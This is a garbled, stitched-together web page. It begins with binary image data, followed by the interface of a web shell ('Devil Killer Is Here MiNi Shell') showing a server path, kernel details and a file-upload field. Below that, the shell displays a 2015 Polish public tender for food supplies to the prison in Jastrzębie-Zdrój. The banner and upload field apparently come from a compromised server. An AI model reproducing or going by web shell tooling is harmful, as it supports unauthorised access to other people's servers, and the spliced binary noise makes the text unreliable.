JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150129/20642-N-2015.html

<p class="kh_header"><b>Jastrzębie-Zdrój: Dostawy nabiału, tłuszczów, ryb, konserw rybnych, konserw mięsnych i innych artykułów spożywczych na potrzeby Zakładu Karnego w Jastrzębiu-Zdroju</b><br>
<b>Numer ogłoszenia: 20642 - 2015; data zamieszczenia: 29.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. C. K. Norwida 23, 44-268 Jastrzębie-Zdrój, woj. śląskie, tel. 32 4759230, faks 32 475 92 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Zakład Karny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy nabiału, tłuszczów, ryb, konserw rybnych, konserw mięsnych i innych artykułów spożywczych na potrzeby Zakładu Karnego w Jastrzębiu-Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający ustala przedmiot zamówienia:
Część I (Art. ogólnospożywcze)  CPV 15890000-3              
1.Liść laurowy - 16 kg
2.Ziele angielskie - 25 kg
3.Majeranek - 12 kg
4.Pieprz naturalny czarny mielony - 150 kg
5.Papryka mielona (ostra)	- 48 kg
6.Przyprawa sucha warzywna (typu Vegeta lub równoważne)	- 270 kg
7.Ocet 	- 600 litrów
8.Herbata ekspres (torebki 1.5g - opakowanie po 100 szt.)	- 4000 opakowań
9.Sól jadalna jodowana -	3500 kg
10.Przyprawa w płynie do zup -	1900 kg
11.Kotlety sojowe	- 600 kg
12.Dżem (wiaderka)	- 600 kg
13.Marmolada (wiaderka)	- 600 kg
14.Koncentrat pomidorowy 30%	- 2500 kg
15.Fasola Jaś średni (worki nie przekraczające 15 kg) - 2000 kg
16.Groch łuskany worki nie przekraczające 15 kg)	- 2500 kg
17.Syrop wysokosłodzony (owocowy do sporządzania napojów, dopuszczalne. smaki malina, wiśnia, truskawka) w opak. 0,2-2 litry	- 100 litrów
18.Zupa w proszku Żurek w opak. 1-5 kg. (termin przydatności do spożycia min. 5 miesięcy)	- 400 kg
19.Zupa w proszku Barszcz biały w opak. 1-5 kg.(termin przydatności do spożycia min. 5 miesięcy) - 300 kg
20.Budyń bez cukru w opakowaniach 1-2 kg.(termin przydatności do spożycia min. 5 miesięcy) - 130 kg
21.Cynamon mielony	- 60 kg
22.Zupa w proszku Pieczarkowa w opak. 1-5 kg.(termin przydatności do spożycia min. 5 miesięcy) - 400 kg
23.Zupa w proszku Brokułowa w opak. 1-5 kg.(termin przydatności do spożycia min. 5 miesięcy) - 400 kg
24.Czosnek granulowany - 30 kg
25.Oregano - 8 kg
26.Kminek - 5 kg
27.Pietruszka zielona sucha - 30 kg
28.Koper suchy - 45 kg
29.Musztarda (pojemniki waga do 5 kg)	 - 150 kg
 
Część II (Ryby)   CPV 15220000-6
1.Filet z mintaja bez glazury mrożony w technologii shatterpack (SHP) w opakowaniach kartonowych do 25kg - 800 kg
- wygląd: brak oznak rozmrożenia, filety całe bez skóry, ości i obcych zanieczyszczeń;
- zapach: właściwy dla ryb mrożonych, po rozmrożeniu zapach ryby  świeżej, niedopuszczalny gnilny;
- tkanka mięsna: jasna o naturalnej barwie, charakterystycznej dla danego gatunku, bez plam i przebarwień; po rozmrożeniu sprężysta, nie rozpadająca się, o prawidłowym zapachu;
- właściwości fizykochemiczne i biologiczne: brak zanieczyszczeń fizycznych, chemicznych, brak oznak i obecności pleśni, szkodników, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych.
Cechy dyskwalifikujące: filety  z uszkodzoną glazurą
Ryba mrożona musi posiadać co najmniej 30 dniowy termin przydatności do spożycia.
Ryby muszą być dostarczane w oryginalnych, nieuszkodzonych, szczelnych , zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach, z podaną informacją dotyczącą nazwy produktu, ilości, terminu ważności oraz nazwy i adresu producenta	
2.Kotlet rybny - produkt garmażeryjny gotowy do spożycia.
Zawartość ryby nie mniej niż 40% masy mięsnej.
Opakowania kartonowe do 5kg - 1500 kg
- wygląd: brak oznak uszkodzenia, kotlety bez  ości i obcych zanieczyszczeń;
- zapach: właściwy dla  ryby  świeżej, niedopuszczalny gnilny;
- właściwości fizykochemiczne i biologiczne: brak zanieczyszczeń fizycznych, chemicznych, brak oznak i obecności pleśni, szkodników, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych.
Kotlety muszą posiadać co najmniej 5 dniowy termin przydatności do spożycia
Kotlety muszą być dostarczane w oryginalnych, nieuszkodzonych, szczelnych , zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach, z podaną informacją dotyczącą nazwy produktu, ilości, terminu ważności oraz nazwy i adresu producenta	

Część III (Konserwy rybne)   CPV 15240000-2
1.Konserwa Szprot w sosie pomidorowym z samootwieraczem	- 1500 kg
2.Konserwa Sałatka rybna typu Neptun lub równoważne z samootwieraczem - 2000 kg
3.Konserwa Paprykarz szczeciński z samootwieraczem - 1500 kg
4.Konserwa Śledź w sosie pomidorowym z samootwieraczem - 1400 kg

(dowolne opakowanie o gramaturze w pełnych dziesiątkach gram np. 200g, 330g- nie dopuszcza się opakowań o wadze np. 225g, 175g,  itp)  

Część IV (Tłuszcze)    CPV 15431100-8              
1.Tłuszcz roślinny (typu margaryna) do smarowania pieczywa o zawartości tłuszczu min 20%  w kostkach od 200g do 500g	- 18000 kg
2.Tłuszcz roślinny do smarowania pieczywa (typu Masło roślinne lub równoważne) o zawartości tłuszczu od 60% do 80% w kostkach od 150g do 300g - 2000 kg
3.Olej roślinny - 1300 litrów
 
Część V (Mleko granulowane)  CPV 15511700-0       
1.Mleko odtłuszczone granulowane (minimalna zawartość białka - 34% , bez domieszki oleju roślinnego, dopuszcza się opakowania do 20 kg) - 1600 kg
           
Część VI (Nabiał)  CPV 15542100-0
1.Ser twaróg półtłusty w kostkach o wadze 0,2-1kg - 6000 kg
2.Serek fromage naturalny (w opakowaniu 100 gram) - 500 kg
3.Serek granulowany czysty (w opakowaniach od 100g do 200g) - 800 kg
4.Śmietana 12% - 2400 kg
5.Ser topiony czysty (op. 100 gram) o zawartości tłuszczu nie mniej niż 27% - 2000 kg
6.Kefir naturalny (opakowania 5-10 kg) - 1500 kg
7.Jogurt owocowy 100-150gr - 3000 szt

Część VII (Konserwy mięsne) CPV 15131000-5
1.Pasztet drobiowy czysty (bez dodatków)  w alupack*	- 2500 kg
2.Konserwa mięsna ok. 300g (plus minus 10g) z samootwieraczem** - 2000 kg
3.Konserwa wieprzowa mielona sterylizowana w alupack* - 900 kg
4.Szynka mielona drobiowa sterylizowana w alupack* - 900 kg

* o wadze w zakresie 90-130g w pełnych dziesiątkach gram, np. 90, 100, ..., 130g - nie dopuszcza się opakowań o wadze np. 95g, 105g,  itp)
** dowolne opakowanie o gramaturze w pełnych dziesiątkach gram np. 200g, 330g- nie dopuszcza się opakowań o wadze np. 225g, 175g,  itp.

Uwaga: aby oferta dotycząca danej części była ważna musi być kompletna tzn. zawierać ceny wszystkich art. wchodzących w skład danej części. Do oceny oferty brana jest pod uwagę tylko cena całej części.

Asortyment będzie dostarczany sukcesywnie, zgodnie z indywidualnymi zamówieniami w okresie  od 01.04.2015 do 31.03.2016 według poniższych zasad:

Nabiał- dostawy nie rzadziej niż 1-2 razy w tygodniu
Tłuszcze- dostawy nie rzadziej niż 1 raz w tygodniu
Konserwy rybne- dostawy nie rzadziej niż 1-2 razy w miesiącu
Konserwy mięsne- dostawy nie rzadziej niż 1-2 razy w miesiącu
Artykuły ogólnospożywcze- dostawy nie rzadziej niż 1 raz w miesiącu
Ryby - dostawy nie rzadziej niż 1-2 razy w miesiącu
Mleko granulowane - dostawy nie rzadziej niż 1 raz w miesiącu

Wszystkie objęte zamówieniem produkty dostarczane będą w opakowaniach dopuszczonych do kontaktu z żywnością. Do każdego opakowania powinna być dołączona etykieta z opisem jego zawartości, powinno zawierać: nazwę dostawcy - producenta, adres, nazwę produktu, masę netto produktu, datę - termin produkcji i przydatności do spożycia (należy spożyć do ... miesiąc, rok), oraz warunki przechowywania.

Zamawiający zobowiązuje jednocześnie Wykonawcę do tego, aby jakość dostarczanych artykułów spożywczych będących przedmiotem niniejszego zamówienia, sposób ich pakowania, a także rodzaj używanych opakowań zbiorczych oraz w stosowanych normach i powszechnie obowiązujących przepisach prawa powodowały obniżenie ponoszonych przez Zamawiającego kosztów przechowywania, przygotowania i dystrybucji dostarczanych artykułów i wytwarzanych z nich potraw oraz kosztów wywozu i utylizacji powstałych odpadów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3, 15.22.00.00-6, 15.24.00.00-2, 15.43.11.00-8, 15.51.17.00-0, 15.54.21.00-0, 15.13.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający zrezygnował z możliwości żądania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający sprawdzi fakt złożenia podpisane oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełniających ten warunek Zamawiający uzna Wykonawców, którzy przedstawią z wykorzystaniem wzoru zawartego w załączniku nr 12 wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw (dostawy) odpowiadających rodzajem przedmiotowi zamówienia, a także o łącznej wartości odpowiadającej co najmniej kwotom:
a)	80 000 zł dla części I (Art. ogólnospożywcze)
b)	15 000 zł dla części II (Ryby)
c)	43 000 zł dla części III (Konserwy rybne)
d)	60 000 zł dla części IV (Tłuszcze)
e)	25 000 zł dla części V (Mleko granulowane)
f)	100 000 zł dla części VI (Nabiał)
g)	 35 000 zł dla części VII (Konserwy mięsne)
Wykaz powinien zawierać informacje o wartości, przedmiocie, datach wykonania i podmiotach, na rzecz których dostawy zostały wykonane, wraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający sprawdzi fakt złożenia podpisane oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający sprawdzi fakt złożenia podpisane oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający sprawdzi fakt złożenia podpisane oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień warunków umowy dotyczących terminu realizacji przedmiotu umowy jedynie w przypadkach niezależnych od Wykonawcy, na skutek klęsk żywiołowych spowodowanych nieodwracalnymi działaniami przyrody lub na skutek działań osób trzecich. Udowodnienie ww. sytuacji leżeć będzie po stronie Wykonawcy
Brzmienie ogólnych warunków umowy może ulec zmianie w dowolnym zakresie jedynie przed terminem składania ofert.
Jeżeli w w trakcie obowiązywania umowy nastąpi zmiana w zakresie podatku VAT, Zamawiający zobowiązuje się do uiszczenia opłaty powiększonej lub pomniejszonej 
o obowiązującą stawkę podatku od towarów i usług na dzień wystawienia faktury VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Jastrzębiu-Zdroju
ul. C.K. Norwida 23
44-268 Jastrzębie-Zdrój.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2015 godzina 10:00, miejsce: Zakład Karny w Jastrzębiu-Zdroju
ul. C.K. Norwida 23
44-268 Jastrzębie-Zdrój - SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I (Art. ogólnospożywcze)  CPV 15890000-3              
1.Liść laurowy - 16 kg
2.Ziele angielskie - 25 kg
3.Majeranek - 12 kg
4.Pieprz naturalny czarny mielony - 150 kg
5.Papryka mielona (ostra)	- 48 kg
6.Przyprawa sucha warzywna (typu Vegeta lub równoważne)	- 270 kg
7.Ocet 	- 600 litrów
8.Herbata ekspres (torebki 1.5g - opakowanie po 100 szt.)	- 4000 opakowań
9.Sól jadalna jodowana -	3500 kg
10.Przyprawa w płynie do zup -	1900 kg
11.Kotlety sojowe	- 600 kg
12.Dżem (wiaderka)	- 600 kg
13.Marmolada (wiaderka)	- 600 kg
14.Koncentrat pomidorowy 30%	- 2500 kg
15.Fasola Jaś średni (worki nie przekraczające 15 kg) - 2000 kg
16.Groch łuskany worki nie przekraczające 15 kg)	- 2500 kg
17.Syrop wysokosłodzony (owocowy do sporządzania napojów, dopuszczalne. smaki malina, wiśnia, truskawka) w opak. 0,2-2 litry	- 100 litrów
18.Zupa w proszku Żurek w opak. 1-5 kg. (termin przydatności do spożycia min. 5 miesięcy)	- 400 kg
19.Zupa w proszku Barszcz biały w opak. 1-5 kg.(termin przydatności do spożycia min. 5 miesięcy) - 300 kg
20.Budyń bez cukru w opakowaniach 1-2 kg.(termin przydatności do spożycia min. 5 miesięcy) - 130 kg
21.Cynamon mielony	- 60 kg
22.Zupa w proszku Pieczarkowa w opak. 1-5 kg.(termin przydatności do spożycia min. 5 miesięcy) - 400 kg
23.Zupa w proszku Brokułowa w opak. 1-5 kg.(termin przydatności do spożycia min. 5 miesięcy) - 400 kg
24.Czosnek granulowany - 30 kg
25.Oregano - 8 kg
26.Kminek - 5 kg
27.Pietruszka zielona sucha - 30 kg
28.Koper suchy - 45 kg
29.Musztarda (pojemniki waga do 5 kg)	 - 150 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II (Ryby)   CPV 15220000-6
1.Filet z mintaja bez glazury mrożony w technologii shatterpack (SHP) w opakowaniach kartonowych do 25kg - 800 kg
- wygląd: brak oznak rozmrożenia, filety całe bez skóry, ości i obcych zanieczyszczeń;
- zapach: właściwy dla ryb mrożonych, po rozmrożeniu zapach ryby  świeżej, niedopuszczalny gnilny;
- tkanka mięsna: jasna o naturalnej barwie, charakterystycznej dla danego gatunku, bez plam i przebarwień; po rozmrożeniu sprężysta, nie rozpadająca się, o prawidłowym zapachu;
- właściwości fizykochemiczne i biologiczne: brak zanieczyszczeń fizycznych, chemicznych, brak oznak i obecności pleśni, szkodników, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych.
Cechy dyskwalifikujące: filety  z uszkodzoną glazurą
Ryba mrożona musi posiadać co najmniej 30 dniowy termin przydatności do spożycia.
Ryby muszą być dostarczane w oryginalnych, nieuszkodzonych, szczelnych , zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach, z podaną informacją dotyczącą nazwy produktu, ilości, terminu ważności oraz nazwy i adresu producenta	
2.Kotlet rybny - produkt garmażeryjny gotowy do spożycia.
Zawartość ryby nie mniej niż 40% masy mięsnej.
Opakowania kartonowe do 5kg - 1500 kg
- wygląd: brak oznak uszkodzenia, kotlety bez  ości i obcych zanieczyszczeń;
- zapach: właściwy dla  ryby  świeżej, niedopuszczalny gnilny;
- właściwości fizykochemiczne i biologiczne: brak zanieczyszczeń fizycznych, chemicznych, brak oznak i obecności pleśni, szkodników, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych.
Kotlety muszą posiadać co najmniej 5 dniowy termin przydatności do spożycia
Kotlety muszą być dostarczane w oryginalnych, nieuszkodzonych, szczelnych , zamkniętych, prawidłowo oznakowanych w języku polskim opakowaniach, z podaną informacją dotyczącą nazwy produktu, ilości, terminu ważności oraz nazwy i adresu producenta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
